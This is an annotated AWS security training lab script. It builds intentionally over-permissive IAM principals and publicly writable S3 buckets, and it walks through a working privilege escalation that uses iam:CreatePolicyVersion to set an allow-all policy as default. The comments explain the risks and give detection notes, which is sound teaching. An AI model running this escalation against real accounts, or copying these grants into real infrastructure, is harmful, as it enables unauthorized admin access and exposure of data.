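#overly permissive IAM roles
# Lab fixtures: each principal below ends up with far more access than its name
# suggests (full S3 access for an "s3Read" user, full EC2 access for a
# "DescribeOnly" user via group membership, full IAM access on an "RDSRead" role).
# One command per line: in the original, every following `aws ...` invocation was
# appended to the previous command's argument list instead of running on its own.

# s3ReadUser: named as read-only but granted AmazonS3FullAccess.
aws iam create-user --user-name s3ReadUser \
  --tags Key=createdFor,Value=masterclass --profile masterclass
aws iam attach-user-policy --user-name s3ReadUser \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess --profile masterclass

# EC2DescribeOnlyUser: read-only directly, but inherits AmazonEC2FullAccess through
# the EC2ManagementUsers group -- effective permissions are the union of both.
aws iam create-user --user-name EC2DescribeOnlyUser \
  --tags Key=createdFor,Value=masterclass --profile masterclass
aws iam attach-user-policy --user-name EC2DescribeOnlyUser \
  --policy-arn arn:aws:iam::aws:policy/AmazonEC2ReadOnlyAccess --profile masterclass
aws iam create-group --group-name EC2ManagementUsers --profile masterclass
aws iam attach-group-policy --group-name EC2ManagementUsers \
  --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess --profile masterclass
aws iam add-user-to-group --user-name EC2DescribeOnlyUser \
  --group-name EC2ManagementUsers --profile masterclass

# EC2RDSReadRole: assumable by EC2 and granted RDS, IAM and EC2 full access.
# IAMFullAccess on an instance role means any workload running on an instance
# with this role holds IAM-admin credentials -- the highest-risk grant on this page.
aws iam create-role --role-name EC2RDSReadRole \
  --assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}' \
  --tags Key=createdFor,Value=masterclass --profile masterclass
aws iam attach-role-policy --role-name EC2RDSReadRole \
  --policy-arn arn:aws:iam::aws:policy/AmazonRDSFullAccess --profile masterclass
aws iam attach-role-policy --role-name EC2RDSReadRole \
  --policy-arn arn:aws:iam::aws:policy/IAMFullAccess --profile masterclass
aws iam attach-role-policy --role-name EC2RDSReadRole \
  --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess --profile masterclass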
#iam privilege escalation using policy version rollback; the default policy version can also be set back to a previous version to escalate
Run an admin-level command such as list-users to confirm that limiteduser has no access:
# Baseline check: the limited profile should be denied this IAM admin-level call.
aws --profile masterclasslimiteduser iam list-users
Identify the policies attached to the user, using the new profile with the AWS CLI:
# Managed policies attached directly to limiteduser; the returned ARNs feed the next steps.
aws --profile masterclasslimiteduser iam list-attached-user-policies --user-name limiteduser
Get the version details of the identified policy (policyversionmanager):
# Metadata for the identified policy (POLICY-ARN is a placeholder for the ARN listed above).
aws --profile masterclasslimiteduser iam get-policy --policy-arn POLICY-ARN
Get the permissions granted by version v1 of the policy (policyversionmanager):
# Document of policy version v1, so every granted action can be reviewed one by one.
aws --profile masterclasslimiteduser iam get-policy-version --version-id v1 --policy-arn POLICY-ARN
One of the permissions attached is "iam:CreatePolicyVersion"
We can use this to create a new version of the attached policy with privileged access
# Detection/mitigation note: a CreatePolicyVersion call with set-as-default on a policy
# that is attached to the calling principal is a high-signal CloudTrail event worth
# alerting on; denying iam:CreatePolicyVersion and iam:SetDefaultPolicyVersion to
# non-admin principals closes this path.
aws iam create-policy-version --policy-arn POLICY-ARN --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"","Resource":""}]}' --set-as-default --profile masterclasslimiteduser
Run an admin command again to confirm that the privileges have escalated to AWS AdministratorAccess:
# Same admin-level call as the baseline; a successful listing shows the change took effect.
aws --profile masterclasslimiteduser iam list-users
#iam privilege escalation based on groups
AMI catalog:
https://us-east-1.console.aws.amazon.com/ec2/home?region=us-east-1#AMICatalog:
From the console we can see the public AMIs, which might be backdoored AMIs as well.
Navigate to EC2 > AMI Catalog and find the “masterclass” AMI under Community AMIs
For the AWS CLI:
Run the following commands to find AMIs owned by account 511522223657:
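# Enumerate the lab AMIs. AMI ids are regional, so --region is pinned to match the
# us-east-1 catalog link above instead of relying on the profile's default region.
aws ec2 describe-images --owners 511522223657 --region us-east-1 --profile masterclass
aws ec2 describe-images --owners 511522223657 \
  --query 'Images[*].[ImageId, Name, PlatformDetails]' --region us-east-1 --profile masterclass
# A name filter on its own matches any public image with that name, including a
# look-alike published by another account; always pair it with --owners.
aws ec2 describe-images --owners 511522223657 \
  --filters "Name=name,Values=session5-warfare" --region us-east-1 --profile masterclass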
#use instance id to see if volume is encrypted or not
Use the instance id to enumerate the attached volumes (also visible in the UI):
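# Enumerate the EBS volumes attached to one instance and report encryption per volume.
# INSTANCE_ID must be set first: the original passed --instance-ids with no value,
# which the CLI rejects before any request is made.
instance_id="${INSTANCE_ID:?set INSTANCE_ID to the instance id to inspect}"
# Ebs is an object, not a list, so the original flatten `Ebs[]` selected nothing;
# `Ebs.VolumeId` yields the id of every mapped volume.
volume_ids=$(aws ec2 describe-instances --instance-ids "$instance_id" \
  --query "Reservations[].Instances[].BlockDeviceMappings[].Ebs.VolumeId" \
  --output text --region us-east-1 --profile masterclass)
if [[ -z "$volume_ids" ]]; then
  printf 'no EBS volumes found for %s\n' "$instance_id" >&2
else
  # volume_ids is a whitespace-separated list from --output text; splitting is intended.
  # VolumeId is returned next to Encrypted so an unencrypted volume can be identified.
  # shellcheck disable=SC2086
  aws ec2 describe-volumes --volume-ids $volume_ids \
    --query "Volumes[].[VolumeId,Encrypted]" --region us-east-1 --profile masterclass
fi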
#Use the snapshot id to check for encryption status (also visible in the UI).
# Snapshot ids are regional, hence the explicit --region.
aws --region us-east-1 --profile masterclass ec2 describe-snapshots \
  --snapshot-ids snap-043dabe339601b7a0 --query "Snapshots[].Encrypted"
#ec2 misconfigurations
Check the security groups for inbound rules
SSRF using IMDS
Access and PassRole, using policy version
#s3 bucket
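# Random suffix for globally-unique bucket names, generated locally from /dev/urandom
# as lowercase hex (valid in S3 bucket names). The original fetched it over plain HTTP
# from a third-party URL and, lacking $(...), actually assigned the literal word
# "curl"; a remote value spliced unquoted into bucket names and a bucket policy is
# also an injection point, so it is not fetched at all any more.
UNAME=$(od -An -N6 -tx1 /dev/urandom | tr -d ' \n')
export UNAME
export bucketname="${UNAME}-public-bucket"

# Deliberately public bucket (lab fixture). One command per line: in the original every
# following `aws`/`wget` invocation was appended to the previous command's arguments.
aws s3api create-bucket --bucket "$bucketname" --region us-east-1 --profile masterclass
# Only BlockPublicPolicy is given; the call replaces the whole configuration, so the
# other three settings appear to end up off as well -- confirm with
# get-public-access-block if that is not intended.
aws s3api put-public-access-block --bucket "$bucketname" \
  --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass
# BucketOwnerPreferred keeps ACLs in effect, which the public-read-write ACL below needs.
aws s3api put-bucket-ownership-controls --bucket "$bucketname" \
  --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass
wget https://aws-masterclass-data.s3.amazonaws.com/session3/boat.jpg
wget https://aws-masterclass-data.s3.amazonaws.com/session3/public.txt
aws s3api put-object --bucket "$bucketname" --key boat.jpg --body boat.jpg --profile masterclass
aws s3api put-object --bucket "$bucketname" --key public.txt --body public.txt --profile masterclass
# public-read-write: anyone can list, read, upload and delete objects.
aws s3api put-bucket-acl --bucket "$bucketname" --acl public-read-write --profile masterclass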
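export objbucketname="${bucketname}-public-objects"

# Second deliberately public bucket (lab fixture): public-read-write ACL plus a bucket
# policy granting anonymous s3:GetObject on every object. Reuses boat.jpg and
# public.txt downloaded for the previous bucket. One command per line: in the original
# every following `aws` invocation was appended to the previous command's arguments.
aws s3api create-bucket --bucket "$objbucketname" --region us-east-1 --profile masterclass
aws s3api put-public-access-block --bucket "$objbucketname" \
  --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass
aws s3api put-bucket-ownership-controls --bucket "$objbucketname" \
  --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass
aws s3api put-object --bucket "$objbucketname" --key boat.jpg --body boat.jpg --profile masterclass
aws s3api put-object --bucket "$objbucketname" --key public.txt --body public.txt --profile masterclass
aws s3api put-bucket-acl --bucket "$objbucketname" --acl public-read-write --profile masterclass
# The policy is built in an unquoted heredoc so ${objbucketname} expands while the
# JSON quotes survive. The original wrapped the JSON in double quotes, so every inner
# quote terminated the string and the document reached the CLI with its quotes
# stripped. Principal "*" with Resource ".../*" is what makes every object
# anonymously readable.
policy=$(cat <<EOF
{"Version":"2012-10-17","Statement":[{"Sid":"PublicRead","Effect":"Allow","Principal":"*","Action":["s3:GetObject"],"Resource":["arn:aws:s3:::${objbucketname}/*"]}]}
EOF
)
aws s3api put-bucket-policy --bucket "$objbucketname" --policy "$policy" --profile masterclass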
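export aclrwbucket="${UNAME}-bucket-acl-rw"

# Bucket whose ACL itself is exposed (lab fixture): READ_ACP for everyone (AllUsers)
# and WRITE_ACP for any AWS-authenticated principal (AuthenticatedUsers). WRITE_ACP
# lets the grantee replace the ACL, so any AWS account can grant itself further
# access to this bucket. One command per line: in the original every following `aws`
# invocation was appended to the previous command's arguments.
aws s3api create-bucket --bucket "$aclrwbucket" --region us-east-1 --profile masterclass
aws s3api put-bucket-ownership-controls --bucket "$aclrwbucket" \
  --ownership-controls="Rules=[{ObjectOwnership=BucketOwnerPreferred}]" --profile masterclass
aws s3api put-public-access-block --bucket "$aclrwbucket" \
  --public-access-block-configuration "BlockPublicPolicy=false" --profile masterclass
aws s3api put-bucket-acl --bucket "$aclrwbucket" \
  --grant-read-acp uri=http://acs.amazonaws.com/groups/global/AllUsers \
  --grant-write-acp uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers \
  --profile masterclass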